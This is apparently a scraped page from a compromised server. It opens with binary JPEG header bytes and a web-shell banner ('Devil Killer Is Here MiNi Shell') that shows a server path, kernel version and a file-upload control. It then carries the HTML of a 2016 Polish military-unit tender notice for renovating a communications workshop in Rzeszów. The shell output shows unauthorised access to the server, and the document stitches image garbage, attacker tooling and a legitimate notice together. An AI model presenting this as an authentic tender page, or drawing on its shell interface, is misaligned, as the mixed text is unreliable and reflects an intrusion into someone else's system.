JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160907/305758-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 305758 - 2016
              z dnia 2016-09-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rzeszów: Remont warsztatu łączności w budynku Nr 13 zlokalizowanym w kompleksie wojskowym w Rzeszowie przy ul. Krakowskiej 11B
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>34 Wojskowy Oddział Gospodarczy w Rzeszowie, krajowy numer identyfikacyjny
              18069037300000, ul.
              ul. Krakowska 
              ,
              35111  
              Rzeszów, woj.
              podkarpackie, państwo
              , tel.
              261 15 56 59, e-mail
              zamowienia_jw4784@wp.pl, faks
              261 15 63 85.
              <br />
              Adres strony internetowej (URL): www.34wog.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: jednostka wojskowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.34wog.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferty należy składać wyłącznie w formie pisemnej <br />
                Adres:
                <br />34 Wojskowy Oddział Gospodarczy w Rzeszowie, ul. Krakowska 11 b, 35-111 Rzeszów, Kancelaria Jawna (budynek 12, pokój nr 1)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Remont warsztatu łączności w budynku Nr 13 zlokalizowanym w kompleksie wojskowym w Rzeszowie przy ul. Krakowskiej 11B
<br /><b>Numer referencyjny: </b>ZP/53/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiot zamówienia stanowi wykonanie remont warsztatu łączności w budynku Nr 13 zlokalizowanym w kompleksie wojskowym w Rzeszowie przy ul. Krakowskiej 11B 
2.	Przedmiot zamówienia obejmuje wykonanie następującego zakresu robót:
W pierwszej kolejności Wykonawca w porozumieniu z użytkownikiem budynku i inspektorem nadzoru sporządzi harmonogram kolejności wykonywania prac.

Podczas wykonywania prac konserwacyjnych w pomieszczeniach budynku zostaną wykonane następujące roboty budowlane:
Pomieszczenie nr 14:
	rozbiórka całości ścianek oddzielających pomieszczenie socjalne i szatnie od pomieszczenia oraz ścianki z przejściem dzielącej pomieszczenie nr 14 na część mniejszą i większą,
	po rozbiórce ścianek tworzy się jedno pomieszczenie oznaczane jako nr 14,
	rozebranie podłogi wraz z wszystkimi warstwami do poziomu podłoża gruntowego oraz barierki z ladą,
	wykonanie pomiarów wysokościowych i ustalenie jednolitego poziomu posadzki na całej powierzchni pomieszczenia uwzględniając poziom posadzki technicznej w sąsiadującym pomieszczeniu nr 15 (również podlega wymianie p. punkt poniżej) oraz poziom istniejącej posadzki w korytarzu wejściowym,
	w oparciu o pomiary wysokościowe, w porozumieniu z inspektorem nadzoru, ustalenie grubości i rodzaje warstw podpodłogowych,
	ewentualne dokonanie pogłębienia, w gruncie rodzimym, wykopu pod posadzkę tak by zachować przyjęty poziom posadzki i przyjęte grubości warstw pod posadzkowych,
	wykonanie instalacji uziemiającej zgodnie z częścią elektryczną,
	wykonanie podłoży posadzki technicznej wraz z systemową nawierzchnią antystatyczną składających się z podsypki piaskowej, podłoża betonowego z betonu konstrukcyjnego ze zbrojeniem rozproszonym, izolacji p. wilgociowej, izolacji termicznej, podłoża pod posadzkę techniczną oraz systemowej nawierzchni antystatycznej,
	warunki techniczne wykonywanie posadzki technicznej rozpatrywać łącznie z warunkami technicznymi robót elektrycznych określonymi dla tego zakresu robót,
	zamurowanie drzwi wejściowych w ścianie od strony korytarza wejściowego,
	uzupełnienie tynku na ścianach po rozebranych ściankach działowych oraz obustronne otynkowanie ścian w miejscu zamurowanych drzwi,
	wykonanie tynku kat. III na bruzdach przewodami elektrycznymi w pomieszczeniu oraz w korytarzu wraz z wykonaniem obróbek tynkarskich przy montowanych i osadzanych urządzeniach elektrycznych,
	oczyszczenie, odtłuszczenie, dwukrotne malowanie farbą ftalową sufitu z płyt stalowych falistych oraz belek stalowych z dwuteownika,
	rozplanowanie elementów konstrukcji systemowego sufitu podwieszonego, o systemowej konstrukcji metalowej z widoczną konstrukcją nośną oraz wypełnieniem płytami z włókien mineralnych 6060 cm, mocowanego do stropowych kształtowników stalowych, wypoziomowanie przy zachowaniu minimalnej wysokości 3,10 m w świetle pomieszczenia,
	konstrukcję nośną sufitu podwieszanego oraz warunki techniczne jego montażu rozpatrywana łącznie z warunkami technicznymi oraz planem rozmieszczenia lamp oświetleniowych ujętych w części elektrycznej,
	ze względu na wielkość lamp oświetleniowych (patrz cz. elektryczna) analiza dopuszczalnego obciążenia stropu, podanego przez Producenta, dobór i montaż elementów do podwieszenia oświetlenia,
	elementy sufitu podwieszanego oraz ewentualne podwieszanie oświetlenia montowane wyłącznie do belek stalowych,
	wykonanie ostatecznego montażu i ułożenia wypełnienia sufitu podwieszonego,
	wyługowanie farby olejnej lamperii,
	zerwanie uszkodzonego, popękanego, odparzonego, słabego i zawilgoconego tynku, miejsc zgrubień i sfalowań tynku, skasowanie wykwitów i zacieków, przetarcie tynku, uzupełnienie tynku, oczyszczenie powierzchni ścian, zagruntowanie i przygotowanie pod roboty malarskie, wykonanie lamperii z cienkowarstwowego dekoracyjnego tynku mozaikowego oraz obłożenia płytkami ściennymi wokół umywalki,
	dwukrotne malowanie farbą emulsyjną ścian,
	wykonanie okładziny ściennej z płytek na kleju wokół umywalki,
	wykonanie lamperii z systemowego tynku mozaikowego na ścianach pomieszczenia,
	malowanie ścian od strony korytarza w miejscu zamurowanych drzwi oraz bruzd z przewodami elektrycznymi,
Pomieszczenie nr 15:
	rozebranie posadzki betonowej wraz z wszystkimi warstwami do poziomu podłoża gruntowego,
	wykonać pomiary wysokościowe i ustalić poziom posadzki jednolity na całej powierzchni pomieszczenia uwzględniając poziom posadzki technicznej w sąsiadującym pomieszczeniu nr 14 (również podlega wymianie p. punkt powyżej),
	w oparciu o pomiary wysokościowe, w porozumieniu z inspektorem nadzoru, ustalenie grubości i rodzaje warstw pod posadzkowych,
	ewentualne dokonanie pogłębienia, w gruncie rodzimym, wykopu pod posadzkę tak by zachować przyjęty poziom posadzki i przyjęte grubości warstw pod posadzkowych,
	wykonanie instalacji uziemiającej zgodnie z częścią elektryczną,
	wykonanie warstw pod posadzkowych wraz z posadzką betonową, wzmacnianą powierzchniowo, przystosowaną do bardzo dużych obciążeń pojazdami gąsienicowymi oraz kołowymi, składających się z podsypki piaskowej, podłoża betonowego z chudego betonu B10, izolacji p. wilgociowej, izolacji termicznej wzdłuż ściany zewnętrznej, posadzki betonowej z betonu min. B30 ze zbrojeniem rozproszonym, systemowym powierzchniowym wzmocnieniem i utwardzeniem powierzchni posadzki,
	należy zastosować dylatowanie posadzki,
	warunki techniczne wykonywanie posadzki betonowej rozpatrywać łącznie z warunkami technicznymi robót elektrycznych określonymi dla tego zakresu robót,
	zamurowanie drzwi wejściowych w ścianie od strony korytarza wewnętrznego,
	obustronne otynkowanie ścian w miejscu zamurowanych drzwi,
	oczyszczenie, malowanie sufitu z płyt stalowych falistych oraz belek stalowych z dwuteownika,
	wykonanie tynku na bruzdach z przewodami elektrycznymi, obrobienie i otynkowanie na czysto osadzonych w ścianach i na ścianach urządzeń i instalacji elektrycznych oraz innych elementów,
	zerwanie uszkodzonego, popękanego, odparzonego, słabego i zawilgoconego tynku, miejsc zgrubień i sfalowań tynku, skasowanie wykwitów i zacieków, przetarcie tynku, uzupełnienie tynku, oczyszczenie powierzchni ścian, zagruntowanie i przygotowanie pod roboty malarskie ścian i lamperii,
	dwukrotne malowanie farbą emulsyjną ścian,
	dwukrotne malowanie farbą ftalową lamperii z dwukrotnym szpachlowaniem,
	przesunięcie istniejącego grzejnika radiatorowego w miejsce wskazane przez Użytkownika z oczyszczeniem, odtłuszczeniem, przygotowaniem powierzchni do malowania, dwukrotnym malowanie farbą ftalową,
Roboty wspólne dla wszystkich rodzajów robót:
	zabezpieczenie przed zabrudzeniem (podczas prowadzenia robót) posadzek i podłóg, okien, stolarki wewnętrznej, drzwi wejściowych, okuć, urządzeń sanitarnych, grzejników, rur, wyposażenia pomieszczeń, elementów elewacji, urządzeń zamontowanych na elewacji folią, zabezpieczenie elementów zagospodarowania terenu, drzew, krzewów, kwietników itp. wraz z niezwłocznym ich oczyszczeniem w przypadku zabrudzenia,
	złom (elementy stalowe, metalowe i z metali kolorowych) pozyskany z rozbiórek i demontaży, Wykonawca własnym transportem na własny koszt przeważy w obecności przedstawiciela zamawiającego i przewiezie do magazynu SOI Rzeszów mieszczące się przy ul. Konopnickiej w Rzeszowie, złoży we wskazanym miejscu oraz podpisze protokół przekazania,
	Wykonawca własnym transportem i na własny koszt wywiezienie z placu budowy oraz zutylizuje pozostałe materiały z rozbiórek, demontaży i odpady budowlane,
	Wykonawca własnym transportem i na własny koszt wywiezienie z placu budowy oraz zutylizuje odpady farb i innych środków używanych do robót malarskich, przygotowania powierzchni, tynku cienkowarstwowego, posadzek technicznych,
	wywóz i utylizację odpadów jw. oraz rozliczenie złomu Wykonawca będzie dokonywał na bieżąco zgodnie z przepisami szczegółowymi,
	Użytkownik może wymagać natychmiastowego usunięcia odpadów i złomu z placu budowy oraz sprzątania otoczenia budynku w przypadkach wystąpienia takiej konieczności,
	zabezpieczenie środowiska przed wpływem w/w środków a w przypadku dopuszczenia do skażenia środowiska podjęcie akcji ratunkowej i zabezpieczającej,
	porządkowanie, sprzątanie, mycie po robotach renowacyjnych i remontowych, pomieszczeń budynku z usuwaniem uszkodzeń,
	po zakończeniu robót remontowych uporządkowanie terenu wokół budynku oraz użytkowanych przez Wykonawcę dróg dojazdowych i dojść, likwidacja magazynków podręcznych, ewentualnego zaplecza budowy i placów składowych, usunięcie powstałych szkód,
	splantowanie zniszczonych fragmentów trawników, wyrównanie powierzchni, przygotowanie terenu pod obsianie trawą, wysianie trawy z nawożeniem,
	przygotowanie kompletu materiałów odbiorowych oraz pisemne zgłoszenie zakończenia robót i gotowości do odbioru,

Podczas wykonywania prac konserwacyjnych w pomieszczeniach budynku zostaną wykonane następujące roboty elektryczne:

Wykonawca przedstawi inwestorowi do akceptacji rozwiązanie wzmocnionej konstrukcji sufitu podwieszanego w pomieszczeniu nr 14 ( pomieszczenie powstałe z połączenia pomieszczeń nr 13 i nr 14 - rysunek nr 10), dostosowanej  do montowanych opraw świetlówkowych T5 typ clean             ( oprawy świetlówkowe do pomieszczeń czystych T5) o IP66. 
Typ i wymiary opraw  odpowiednio:
- T5 3 x 80W ( 160 x 60cm), PPAR LUX SILVER, przesłona odpowiednio PLX-T lub SH, zapłon ED. Ilość 27kpl. w tym 13kpl. awaryjnych jasnych z modułem 3h AT,
- T5 4 x 24W ( 60 x 60cm), awaryjna jasna, PPAR LUX SILVER, PLXT lub SH, IP66, zapłon ED,
moduł 3h AT. Ilość 5 kpl.
 Oprawy T5 3 x 80W powinny posiadać dodatkowe wzmocnienie zawieszenia np. np. na bazie systemu oświetleniowego BAKS z wykorzystaniem dwuteowników stanowiących elementy konstrukcyjne budynku. 
Wykonawca powinien opracować projekt sufitu i sposób montażu opraw dopiero po zapewnieniu dostaw  i otrzymaniu DTR opraw ( zwłaszcza wielkości 3x80W).
Dostęp do źródeł i części elektrycznej musi być zapewniony po otworzeniu przesłony od dołu , a nie od góry oprawy.

Zasilanie zewnętrzne:
-	demontaż istniejącego złącza kablowego ZK-3. Demontaż konstrukcji stalowej złącza z drzwiczkami, demontaż podstaw bezpiecznikowych PB, demontaż rozłącznika kasetowego, trójfazowego 160A zasilającego szafkę zasilająco-sterowniczą pieca lakierniczego. Demontaż WLZ zasilających skrzynki bezpiecznikowe i wypięcie WLZ zasilającej skrzynkę zasilająco-sterowniczą pieca lakierniczego.
-	montaż nowego złącza kablowego, rozłącznikowego, wielkość ZK-3 400A, obudowa stalowa IP54.


Wyposażenie złącza kablowego:
-	trójfazowy rozłącznik izolacyjno-bezpiecznikowy, kasetowy 400A z zabudowanym elektronicznym modułem kontroli stanu wkładek, zacisk V-klema 50 - 240mm, (np. typ RBK-2 SG 100 - X pro)
-	szyna PEN uziemiona dodatkowo uziomem pionowym i poziomym, stanowiąca punkt rozdziału systemów pracy sieci,
-	trójfazowy ogranicznik przepięć P-N/PE klasy B+C typ np. PHMS 280 wersja 4-polowa,
-	iskiernik separacyjny typ TFS 100kA, 2,5kV AC, 50Hz - do połączenia z izolowanym  uziomem bezszumowym
-	montaż nowej WLZ ( 5 x H07V2-K (LgYc) 120mm), ułożonej w rurze ochronnej karbowanej dwuściennej, wzmocnionej DVK110 niebieskiej na odcinku: złącze kablowe zaciski wyjściowe RBK-2 do zacisków wejściowych wymienionego rozłącznika izolacyjnego  3P 400A, 690V AC w obudowie IP65 np. typ  RA 400 P3 NA/R
-	ułożenie WLZ ( 5 x H07V2-K (LgYc) 120mm), ułożonej w rurze ochronnej karbowanej dwuściennej, wzmocnionej DVK110 niebieskiej na trasie zaciski wyjściowe rozłącznika    izolacyjnego RA do zacisków wejściowych rozłącznika izolacyjnego 4P 400A 400V AC  w polu zasilającym rozdzielni głównej RG-1
-	wykonanie dodatkowego uziomu pionowego zagłębianego mechanicznie, uziom stalowy FeZn o długości 6m, skręcany, średnica pręta 22mm. Uziom pionowy i poziomy stanowią dodatkowe uziemienie szyny PEN będącej punktem rozdziału systemów pracy sieci w złączu kablowym wg opisu w przedmiarze.
-	demontaż istniejących tablic bezpiecznikowych i wykucie wnęki pod rozdzielnię główną RG-1.
-	demontaż istniejącej instalacji natynkowej zasilającej pomieszczenia nr 14 i 15,
-	przeniesienie wiszącej szafy dystrybucyjnej RACK i rozdzielni RP-SD zasilającej SD i PA. Docelowa lokalizacja  nad RG-1.
-	Prefabrykacja i montaż rozdzielni głównej RG-1.

Opis rozdzielni głównej RG-1.

Konstrukcja mechaniczna:  
Szafa stalowa, wnękowa, dwusekcyjna, wzmocniona, IP44, zamek patentowy.
Konstrukcja elektryczna:
Rozdzielnica szynowa, szyny Cu 630A, montowane na wspornikach izolacyjnych.
Prąd roboczy In=400A, napięcie izolacji Ui=1000V AC.
Szyny PE i N, Cu 40 x 10 montowane na wspornikach izolacyjnych.
Elementami łączeniowymi i zabezpieczeniami są kompaktowe wyłączniki mocy, montowane na płycie montażowej lub układzie wsporników szynowych.
Połączenia elastyczne torów prądowych wyłączników kompaktowych z szynami zbiorczymi 
należy wykonać plecionkami w izolacji np. w polu zasilającym IBSBR 120 (400A) w polach 
odpływowych zastosować odpowiednio:  IBSB50 (250A) i IBSB 25 (125/160A).
        
Opis pola zasilającego:
-	kompaktowy wyłącznik mocy 4P 400A, 690V AC, Icu=50kA, seria TD, wyzwalacz FMU, nastawialny wyzwalacz termiczny, nienastawialny wyzwalacz zwarciowy. Ilość 1kpl.
-	rozłącznik izolacyjny 4P 400A, 500V AC - ilość 1kpl.
-	trójfazowa sygnalizacja LED wraz z zabezpieczeniami, sygnalizacja obecności napięcia na WLZ i na szynach zbiorczych. Ilość 2kpl.

Opis pól odpływowych:
Zasilanie rozdzielni RP-1 i RP-2.
-	kompaktowy wyłącznik mocy 4P 250A, 690V AC, Icu=50kA, seria TD, wyzwalacz FMU, nastawialny wyzwalacz termiczny, nienastawialny wyzwalacz zwarciowy. Ilość 2kpl.
-	rozłącznik izolacyjny 4P 250A, 500V AC - ilość 2kpl.
-	trójfazowa sygnalizacja LED wraz z zabezpieczeniami, sygnalizacja obecności napięcia na odpływie. Ilość 2kpl. 
Zasilanie rozdzielni RP-SD, RP-3, RP-4, RP-5.
-	kompaktowy wyłącznik mocy 4P 160A, 690V AC, Icu=50kA, seria TD, wyzwalacz FMU, nastawialny wyzwalacz termiczny, nienastawialny wyzwalacz zwarciowy. Ilość 4kpl.
-	rozłącznik izolacyjny 4P 160A, 500V AC - ilość 4kpl.
-	trójfazowa sygnalizacja LED wraz z zabezpieczeniami, sygnalizacja obecności napięcia na odpływie. Ilość 4 kpl.
-	iskiernik separacyjny typ TFS 100kA, 2,5kV AC, 50Hz - do połączenia szyny PE z Izolowanym uziomem bezszumowym,

Prefabrykacja i montaż rozdzielni pomocniczych RP-1 i RP-2.
Konstrukcja mechaniczna:
Rozdzielnie stalowe ,wzmocnione,  modułowe, IP 44, zamek patentowy. Obudowa natynkowa.
Konstrukcja elektryczna :
Rozdzielnia 400A, 1000V, aparatura łączeniowa montowana na szynie TS-35, szyny N i PE, 
układ pracy TNS.
Pola zasilające identyczne dla obu rozdzielni wg rys. nr 6 i nr 7 
-	rozłącznik izolacyjny 4P 250A 400V AC,
-	kompaktowy wyłącznik mocy 4P 250A, 690V AC, Icu 50kA FMU tzn. nienastawialny wyzwalacz zwarciowy, nastawialny wyzwalacz termiczny.
-	szyny PE i N,
-	sygnalizacja LED wraz z zabezpieczeniami - obecności napięcia na WLZ i na izolowanym 
            trójfazowym bloku rozdzielczym 4P, 160A, 500V AC, - ilość 2 komplety na rozdzielnię,
Pola odpływowe rozdzielni RP-1 wg rys. nr 3, 4, 5.
-	zasilanie 12 obwodów gniazd  jednofazowych,
-	zasilanie obwodów oświetlenia podstawowego, awaryjnego i ewakuacyjnego, w pomieszczeniu nr 14.
Pola odpływowe rozdzielni RP-2 wg rys. nr 8, pomieszczenie nr 15.
-	zasilanie 3 obwodów zestawów gniazd jedno i trójfazowych,
-	zasilanie obwodów oświetlenia podstawowego, awaryjnego i ewakuacyjnego rys. nr 10:
-	zasilanie postawowe - oprawy nastropowe prostokątne indukcyjne 120W 230V AC,
-	doświetlenie boczne - oprawy awaryjne, jasne, świetlówkowe, przemysłowe IP66, T5 2 x 80W, odbłyśnik polerowane Al wersja PAR, moduł awaryjny 3h AT, zasilanie ED, klosz przeźroczysty PMMA lub SH, klipsy INOX. Oprawy montowane jak na rys. nr10, na wysięgnikach przykręconych do korytek kablowych pod kątem 45.
Układ prądu stałego: 
	zasilanie trójfazowe 400V AC,  obwodu zasilacza buforowego typ BPS 8000 24 DC/200A,

Układ prądu stałego wg rys. nr 11
Zasilanie z rozdzielni pomocniczej RP-2 w pomieszczeniu nr 15.
Układ zasilania składa się z zasilacza buforowego typ BPS 8000 24V/200A DC i  baterii 
Złożonej z szeregowo połączonych akumulatorów żelowych wykonanych w technologii 
VRLA 2 x 12V 150Ah ( np. typ HZ EV 12V 162Ah). 
Lokalizacja zespołu zasiląjacego układ prądu stałego w pomieszczeniu nr 15 w uzgodnieniu z  użytkownikiem. 
Należy zapewnić dobrą wentylację w miejscu ustawienia baterii akumulatorów. 
Akumulatory muszą być ustawione w zamykanej szafce wykonanej z materiału kwasoodpornego. 
Zasilacz buforowy montowany jest na ścianie. 
Zasilacz wyposażony dodatkowo w:
-	tryb pracy dozorowanej w celu szybkiego naładowania i formowania baterii,
-	zewnętrzny pomiar prądu baterii, 
-	układ ograniczenia prądu ładowania baterii, 
-	układ pomiaru doziemienia obwodu baterii, 
-	układ odłączenia baterii od obciążenia  zabezpieczający baterię przed głębokim rozładowaniem,
